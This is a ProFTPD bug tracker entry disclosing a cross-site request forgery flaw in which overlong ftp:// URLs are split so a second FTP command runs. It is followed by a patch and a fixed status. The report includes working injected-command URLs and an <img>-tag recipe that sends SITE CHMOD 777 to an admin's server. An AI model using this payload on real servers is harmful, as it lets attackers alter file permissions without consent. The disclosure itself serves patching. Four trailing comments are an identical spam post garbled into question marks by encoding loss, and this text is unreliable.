/ Bug 3115 – Cross-site request forgery
Bug 3115 - Cross-site request forgery
: Cross-site request forgery
Status: CLOSED FIXED
Product: ProFTPD
core
: 1.3.1
: All All
: P2 normal
Assigned To: proftpd development group
:
:
:
:
  Show dependency treegraph
 
Reported: 2008-09-20 16:10 UTC by TJ Saunders
Modified: 2009-03-02 09:49 UTC (History)
1 user (show)

See Also:


Attachments
Fixes bug (5.30 KB, patch)
2008-09-20 16:13 UTC, TJ Saunders
Details

Note You need to log in before you can comment on or make changes to this bug.
Description TJ Saunders 2008-09-20 16:10:27 UTC
Maksymilian Arciemowicz of securityreason.com reported the following:

ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The
server uses the TCP protocol and listens at the port specified with the -P
option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or
session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of
malicious exploit of a website whereby unauthorized commands are
transmitted from a user the website trusts. Contrary to cross-site
scripting (XSS), which exploits the trust a user has for a particular site,
cross-site request forgery exploits the trust that a site has for a
particular user.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

--- 1. ftpd *BSD - Cross-site request forgery ---
The main problem exists in spliting long command for few others. The
problem stems from the fact the use of the loop while() and function
fgets().

Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

will be split for

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA':
command not understood.
500'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

When we try call to ftp daemon via browsers and path is longer 512<, our
URL will be split.

/* FreeBSD 7.0 */
ftp://cxib@127.0.0.1//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst

return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506

/* NetBSD 4.0 */
ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

The situation, can be dangerous, when this bug can be exploited like any
CSRF attack. Because we can use SITE CHMOD command to change file
permission. Only we need some exploit and luck, that admin will executed
it.

How to exploit it?

0. Creating some html file with <img> tags
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
..

1. Give preparing URL for admin.

Example:
ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change permission to EXAMPLEFILE when the owner will use this URL.

I think, it should be some byte, what inform about overflow (empty command
should nulling this byte). We have diagnosed this issue on BSD systems.
Unfortunately, we do not know exactly how many machines can be infected.

--- 2. How to fix ---
OpenBSD has been first informed. Fix is avalible on cvs:

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

Thanks for OpenBSD teams.
Comment 1 TJ Saunders 2008-09-20 16:13:52 UTC
Created attachment 2871 [details]
Fixes bug
Comment 2 TJ Saunders 2008-09-20 16:20:38 UTC
Patch committed to CVS.

The patch also covers the case where the admin might configure a
PR_TUNABLE_BUFFER_SIZE which is smaller than the default command buffer size
(i.e. the buffer size which is used by default if the CommandBufferSize
configuration directive is not configured).
Comment 3 TJ Saunders 2008-11-21 00:56:49 UTC
Resolved in 1.3.2rc3.
Comment 4 ??? ???? 2009-02-06 01:04:50 UTC
?? ???????? ???? ???? ?? ??? ??? ????

????? ??? ???? ???? ???? ????

????? ?? ???? ?? ??? ???

??? ????? ?? ??? ???

??? ?????? ?? ??? ???

??? ?????? ?? ??? ????

??? ?????? ?? ??? ?????

??? ?????? ?? ??? ????

??? ?????? ?? ??? ????

????? ?????? ???????? ???????? ????? ???? ???? ?? ???? ?????? ???? ?? ????
?????? ???? ??? ????? ???? ?

 ????? ?????? ?????? ???? ?????? ???????? ? ???? ???? ????? ?? ?? ??? ??? ?? ??
???? ?

????? ???? ?? ???? ??????? ????????? ?? ???? ????? ?????? ?? ??????

????? ??? ?? ????

????? ???? ?? ????

????? ???? ??? ?? ???

????? ????? ????? ?????

????? ???? ???? ??? ???

????? ???? ?? ???? ?? ????? ???? ?????? ????????

????? ?? ???? ?? ???? ?????? ??? ??? ??? ???? ?????? ??????????

????? ??????????? ?????

???????????? ??????

?????? ????? ???????? ???? ?????? ????????

????? ?? ???? ??????? ????????? ???? ????? ????? ?? ???? ?? ?????? ?? ????? ??
????? ?? ????? ????? ?? ????? 

?????????????? ?????? ????????? ????? ?? ??????

????? ?? ??????

????? ????? ?????????? ????

????? ???? ?????? ? ????????? ????

????? ???? ????? ???? ??????

????? ????? ???? ??? ???? ????? ?? ?? ?????? ????????

????????? ????


???? ???? ??? ?????? ???????? ???? ?????

???? ??????? ?? ????? ???? ???? ????? 

??? ???? ????? ???? ??? ?????? ?????? ???? ????????

?? ?? ????? ?????? ??? ?? ???? ?? ???? ????? ???? ???? ?????

???? ???? ?????????????? ?? ???? ??? ??? ????? ?????????? ???? ??? ??? ??????

??! ???? ??????? ?????????? ???? ????? ??? ?? ????? ???????? ????? ????
????????


????? ???????? ?????? :*__*:

?????? ??? ????? ?????? 

????? ??? ???? ????? ??? 

??????? ??????


????? ???? ????????? ?? ??? ???? 

??? ????

www.a7a7@hotmail.com   
Comment 5 ??? ???? 2009-02-06 01:07:15 UTC
?? ???????? ???? ???? ?? ??? ??? ????

????? ??? ???? ???? ???? ????

????? ?? ???? ?? ??? ???

??? ????? ?? ??? ???

??? ?????? ?? ??? ???

??? ?????? ?? ??? ????

??? ?????? ?? ??? ?????

??? ?????? ?? ??? ????

??? ?????? ?? ??? ????

????? ?????? ???????? ???????? ????? ???? ???? ?? ???? ?????? ???? ?? ????
?????? ???? ??? ????? ???? ?

 ????? ?????? ?????? ???? ?????? ???????? ? ???? ???? ????? ?? ?? ??? ??? ?? ??
???? ?

????? ???? ?? ???? ??????? ????????? ?? ???? ????? ?????? ?? ??????

????? ??? ?? ????

????? ???? ?? ????

????? ???? ??? ?? ???

????? ????? ????? ?????

????? ???? ???? ??? ???

????? ???? ?? ???? ?? ????? ???? ?????? ????????

????? ?? ???? ?? ???? ?????? ??? ??? ??? ???? ?????? ??????????

????? ??????????? ?????

???????????? ??????

?????? ????? ???????? ???? ?????? ????????

????? ?? ???? ??????? ????????? ???? ????? ????? ?? ???? ?? ?????? ?? ????? ??
????? ?? ????? ????? ?? ????? 

?????????????? ?????? ????????? ????? ?? ??????

????? ?? ??????

????? ????? ?????????? ????

????? ???? ?????? ? ????????? ????

????? ???? ????? ???? ??????

????? ????? ???? ??? ???? ????? ?? ?? ?????? ????????

????????? ????


???? ???? ??? ?????? ???????? ???? ?????

???? ??????? ?? ????? ???? ???? ????? 

??? ???? ????? ???? ??? ?????? ?????? ???? ????????

?? ?? ????? ?????? ??? ?? ???? ?? ???? ????? ???? ???? ?????

???? ???? ?????????????? ?? ???? ??? ??? ????? ?????????? ???? ??? ??? ??????

??! ???? ??????? ?????????? ???? ????? ??? ?? ????? ???????? ????? ????
????????


????? ???????? ?????? :*__*:

?????? ??? ????? ?????? 

????? ??? ???? ????? ??? 

??????? ??????


????? ???? ????????? ?? ??? ???? 

??? ????

www.a7a7@hotmail.com   
Comment 6 ??? ???? 2009-02-06 01:08:12 UTC
?? ???????? ???? ???? ?? ??? ??? ????

????? ??? ???? ???? ???? ????

????? ?? ???? ?? ??? ???

??? ????? ?? ??? ???

??? ?????? ?? ??? ???

??? ?????? ?? ??? ????

??? ?????? ?? ??? ?????

??? ?????? ?? ??? ????

??? ?????? ?? ??? ????

????? ?????? ???????? ???????? ????? ???? ???? ?? ???? ?????? ???? ?? ????
?????? ???? ??? ????? ???? ?

 ????? ?????? ?????? ???? ?????? ???????? ? ???? ???? ????? ?? ?? ??? ??? ?? ??
???? ?

????? ???? ?? ???? ??????? ????????? ?? ???? ????? ?????? ?? ??????

????? ??? ?? ????

????? ???? ?? ????

????? ???? ??? ?? ???

????? ????? ????? ?????

????? ???? ???? ??? ???

????? ???? ?? ???? ?? ????? ???? ?????? ????????

????? ?? ???? ?? ???? ?????? ??? ??? ??? ???? ?????? ??????????

????? ??????????? ?????

???????????? ??????

?????? ????? ???????? ???? ?????? ????????

????? ?? ???? ??????? ????????? ???? ????? ????? ?? ???? ?? ?????? ?? ????? ??
????? ?? ????? ????? ?? ????? 

?????????????? ?????? ????????? ????? ?? ??????

????? ?? ??????

????? ????? ?????????? ????

????? ???? ?????? ? ????????? ????

????? ???? ????? ???? ??????

????? ????? ???? ??? ???? ????? ?? ?? ?????? ????????

????????? ????


???? ???? ??? ?????? ???????? ???? ?????

???? ??????? ?? ????? ???? ???? ????? 

??? ???? ????? ???? ??? ?????? ?????? ???? ????????

?? ?? ????? ?????? ??? ?? ???? ?? ???? ????? ???? ???? ?????

???? ???? ?????????????? ?? ???? ??? ??? ????? ?????????? ???? ??? ??? ??????

??! ???? ??????? ?????????? ???? ????? ??? ?? ????? ???????? ????? ????
????????


????? ???????? ?????? :*__*:

?????? ??? ????? ?????? 

????? ??? ???? ????? ??? 

??????? ??????


????? ???? ????????? ?? ??? ???? 

??? ????

www.a7a7@hotmail.com   
Comment 7 ??? ???? 2009-02-06 03:03:56 UTC
?? ???????? ???? ???? ?? ??? ??? ????

????? ??? ???? ???? ???? ????

????? ?? ???? ?? ??? ???

??? ????? ?? ??? ???

??? ?????? ?? ??? ???

??? ?????? ?? ??? ????

??? ?????? ?? ??? ?????

??? ?????? ?? ??? ????

??? ?????? ?? ??? ????

????? ?????? ???????? ???????? ????? ???? ???? ?? ???? ?????? ???? ?? ????
?????? ???? ??? ????? ???? ?

 ????? ?????? ?????? ???? ?????? ???????? ? ???? ???? ????? ?? ?? ??? ??? ?? ??
???? ?

????? ???? ?? ???? ??????? ????????? ?? ???? ????? ?????? ?? ??????

????? ??? ?? ????

????? ???? ?? ????

????? ???? ??? ?? ???

????? ????? ????? ?????

????? ???? ???? ??? ???

????? ???? ?? ???? ?? ????? ???? ?????? ????????

????? ?? ???? ?? ???? ?????? ??? ??? ??? ???? ?????? ??????????

????? ??????????? ?????

???????????? ??????

?????? ????? ???????? ???? ?????? ????????

????? ?? ???? ??????? ????????? ???? ????? ????? ?? ???? ?? ?????? ?? ????? ??
????? ?? ????? ????? ?? ????? 

?????????????? ?????? ????????? ????? ?? ??????

????? ?? ??????

????? ????? ?????????? ????

????? ???? ?????? ? ????????? ????

????? ???? ????? ???? ??????

????? ????? ???? ??? ???? ????? ?? ?? ?????? ????????

????????? ????


???? ???? ??? ?????? ???????? ???? ?????

???? ??????? ?? ????? ???? ???? ????? 

??? ???? ????? ???? ??? ?????? ?????? ???? ????????

?? ?? ????? ?????? ??? ?? ???? ?? ???? ????? ???? ???? ?????

???? ???? ?????????????? ?? ???? ??? ??? ????? ?????????? ???? ??? ??? ??????

??! ???? ??????? ?????????? ???? ????? ??? ?? ????? ???????? ????? ????
????????


????? ???????? ?????? :*__*:

?????? ??? ????? ?????? 

????? ??? ???? ????? ??? 

??????? ??????


????? ???? ????????? ?? ??? ???? 

??? ????

www.a7a7@hotmail.com